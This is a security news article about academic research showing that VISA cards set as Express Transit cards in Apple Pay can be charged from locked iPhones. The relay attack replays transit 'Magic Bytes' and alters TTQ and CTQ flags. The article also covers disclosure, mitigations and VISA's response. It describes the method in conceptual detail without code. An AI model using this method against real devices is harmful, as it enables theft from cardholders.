Researchers have discovered a way that allows an adversary to steal money from Apple Pay accounts of target iPhones. All it takes is to exploit the underlying weaknesses in how VISA card is set on an iPhone’s Apple Pay. This method works even for locked devices at a distance, e.g. a locked iPhone in someone’s bag.
A Sophisticated Attack To Steal Money Via Apple Pay
A team of academic researchers has found how an adversary can steal money from target iPhones by exploiting Apple Pay.
Specifically, they have found vulnerabilities in how VISA card is set up in Apple Pay for EMV contactless transactions. While these EMV relay attacks are possible theoretically, Samsung already applies a mitigative strategy.
Apple also implements biometric authentication methods (Face ID or fingerprint) for successful payments via Apple Pay. However, bypassing these security checks remains possible due to the underlying vulnerabilities at VISA’s end (alongside Apple Pay). Nonetheless, such attacks do not affect Mastercard on Apple Pay.
How the attack works
The attack typically exploits the vulnerability in Apple Pay’s “Express Transit/Travel” feature. It facilitates making contactless payments to EMV readers at transport-ticketing barrier stations without unlocking the device.
In simple words, it works as Apple Pay recognizes “Magic Bytes’ (non-standard sequence of bytes) broadcast from the Transport for London (TfL) ticket-gate readers. These Magic Bytes can bypass the lock screen for swift transactions. As the researchers explained,
If a non-standard sequence of bytes (Magic Bytes) precedes the standard ISO 14443-A WakeUp command, Apple Pay will consider this a transaction with a transport EMV reader.
That’s what an adversary can exploit. This “MiTM replay and relay” attack requires the target iPhone have VISA card configured as the ‘transport card”. Then, using a card emulator, the adversary can target the iPhone in close proximity to make payments to a non-transport EMV reader.
It happens because the system allows transactions with transport EMV readers with intermittent connectivity (known as Offline Data Authentication (ODA)).
Describing the attack methodology, the researchers stated on the webpage,
The attack works by first replaying the Magic Bytes to the iPhone, such that it believes the transaction is happening with a transport EMV reader. Secondly, while relaying the EMV messages, the Terminal Transaction Qualifiers (TTQ), sent by the EMV terminal, need to be modified such that the bits (flags) for Offline Data Authentication (ODA) for Online Authorizations supported and EMV mode supported are set…
To relay transactions over the contactless limit, the Card Transaction Qualifiers (CTQ), sent by the iPhone, need to be modified such that the bit (flag) for Consumer Device Cardholder Verification Method is set. This tricks the EMV reader into believing that on-device user authentication has been performed (e.g. by fingerprint).
The researchers have demonstrated the attack in this video.
Suggested Mitigations
Samsung also offers similar features for contactless EMV transactions via Samsung Pay. Also, it doesn’t employ Magic Bytes, hence always allowing transactions with locked Samsung phones. However, it implements “zero value payment” that makes transport (TfL) providers charge tickets using the data associated with these zero-value transactions.
As for the Apple Pay issue, the researchers have responsibly disclosed their findings to both Apple and VISA. However, none of them has definitively fixed the issue yet. Hence, the vulnerability continues to exist.
Therefore, the researchers advise users to avoid setting up VISA as a transport card in Apple Pay as a workaround.
Nonetheless, VISA denies any real-time security risks to the users as it provided the following statement to Bleeping Computer,
Visa cards connected to Apple Pay Express Transit are secure and cardholders should continue to use them with confidence. Variations of contactless fraud schemes have been studied in laboratory settings for more than a decade and have proven to be impractical to execute at scale in the real world. Visa takes all security threats very seriously, and we work tirelessly to strengthen payment security across the ecosystem”
The team has shared a dedicated research paper on these findings that they will present at the IEEE Symposium on Security and Privacy 2022.